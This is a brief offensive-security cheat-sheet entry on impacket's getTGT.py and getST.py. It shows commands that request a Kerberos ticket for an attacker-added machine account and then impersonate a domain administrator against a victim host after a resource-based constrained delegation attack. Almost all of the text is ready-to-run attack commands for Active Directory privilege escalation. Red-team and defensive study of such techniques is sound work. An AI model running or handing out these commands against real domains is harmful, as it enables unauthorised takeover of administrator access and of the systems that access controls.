gettgt

Part of impacket and is helpful in getting Kerberos TGTs!

Request a TGT for a "GHOSTY" machine you added to Active Directory

getTGT.py domain.com/GHOSTY$

Impersonate a high privilege user against a victim system you've done a RBCD attack on

getST.py -impersonate 'domainadmin' -spn 'cifs/victim.domain.com' 'domain.com/GHOSTY$' -k -no-pass